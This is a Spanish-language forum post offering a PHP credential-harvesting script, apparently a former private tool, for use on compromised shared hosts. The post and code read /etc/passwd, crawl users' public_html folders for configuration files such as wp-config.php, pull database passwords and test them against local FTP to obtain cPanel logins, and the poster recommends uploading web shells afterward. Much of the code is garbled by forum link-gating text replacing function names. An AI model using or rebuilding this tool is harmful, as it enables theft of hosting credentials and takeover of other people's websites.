buenas, aquí le dejo esta herramienta muy util para sacar muchos hackedhost en mis tiempo era una tool private del foto vip@r00t-y0u.org
a según ese foro lo defaceraon y por ahí subieron todas las tool private (googleen xD)
solo necesitas subirla algún hackedhost y ejecutarlo.. el sistema empezara a buscar las clave de cpanel del host ademas también publica directorio "bypasseable" es decir si en ese host hay varias pagina alojada te da el directorio de dicha web por ejemplo "home/$underc0de/public_html/" entonces por medio de shell entramos en ese directorio.. En caso que tengamos permisos de escritura podemos subir shell por ahí en caso que no entonces hay que revisar que cms usa editar el config.php y subir la shell
espero que aun funcione.. esta herramienta me fue muy útil
<?php
echo "<html>";
echo "<title>vip@r00t-y0u.org</title><body>";
##################
@$passwd=You are not allowed to view links.
Register or
Login('/etc/passwd','r'); if (!$passwd) {
echo "[-] Error : coudn't read /etc/passwd";
}
$path_to_public=You are not allowed to view links.
Register or
Login(); $pathtoconf=You are not allowed to view links.
Register or
Login(); $i=0;
while(!You are not allowed to view links.
Register or
Login($passwd)) { $str=You are not allowed to view links.
Register or
Login($passwd); if ($i>35) {
$pos=You are not allowed to view links.
Register or
Login($str,":"); $username=You are not allowed to view links.
Register or
Login($str,0,$pos); $dirz="/home/$username/public_html/";
if (($username!="")) {
if (You are not allowed to view links.
Register or
Login($dirz)) { You are not allowed to view links.
Register or
Login($users,$username); You are not allowed to view links.
Register or
Login($path_to_public,$dirz); }
}
}
$i++;
}
###################
#########################
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";
echo "[+] Founded ".You are not allowed to view links.
Register or
Login($users)." entrys in /etc/passwd\n"; echo "[+] Founded ".You are not allowed to view links.
Register or
Login($path_to_public)." readable public_html directories\n";
echo "[~] Searching for passwords in config.* files...\n\n";
foreach ($users as $user) {
$path="/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n[+] Done\n";
function read_dir($path,$username) {
if ($handle = You are not allowed to view links.
Register or
Login($path)) { while (false !== ($file = You are not allowed to view links.
Register or
Login($handle))) { $fpath="$path$file";
if (($file!='.') and ($file!='..')) {
if (You are not allowed to view links.
Register or
Login($fpath)) { $dr="$fpath/";
read_dir($dr,$username);
}
else {
if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) {
$pass=get_pass($fpath);
if ($pass!='') {
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link) {
@$config=You are not allowed to view links.
Register or
Login($link,'r'); while(!You are not allowed to view links.
Register or
Login($config)) { $line=You are not allowed to view links.
Register or
Login($config); if (You are not allowed to view links.
Register or
Login($line,'pass') or You are not allowed to view links.
Register or
Login($line,'password') or You are not allowed to view links.
Register or
Login($line,'passwd')) { if (You are not allowed to view links.
Register or
Login($line,'"')) $pass=You are not allowed to view links.
Register or
Login($line,(You are not allowed to view links.
Register or
Login($line,'=')+3),(You are not allowed to view links.
Register or
Login($line,'"')-(You are not allowed to view links.
Register or
Login($line,'=')+3))); else
$pass=You are not allowed to view links.
Register or
Login($line,(You are not allowed to view links.
Register or
Login($line,'=')+3),(You are not allowed to view links.
Register or
Login($line,"'")-(You are not allowed to view links.
Register or
Login($line,'=')+3))); return $pass;
}
}
}
function ftp_check($login,$pass) {
@$ftp=You are not allowed to view links.
Register or
Login('127.0.0.1'); if ($ftp) {
@$res=You are not allowed to view links.
Register or
Login($ftp,$login,$pass); if ($res) {
echo '[Cpanel Found !!!] '.$login.':'.$pass." Success\n";
}
}
}
echo "</textarea><br>";
echo "</body></html>";
?>
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies.
.
Similar topics (5)
Septiembre 06, 2012, 03:26:16 pm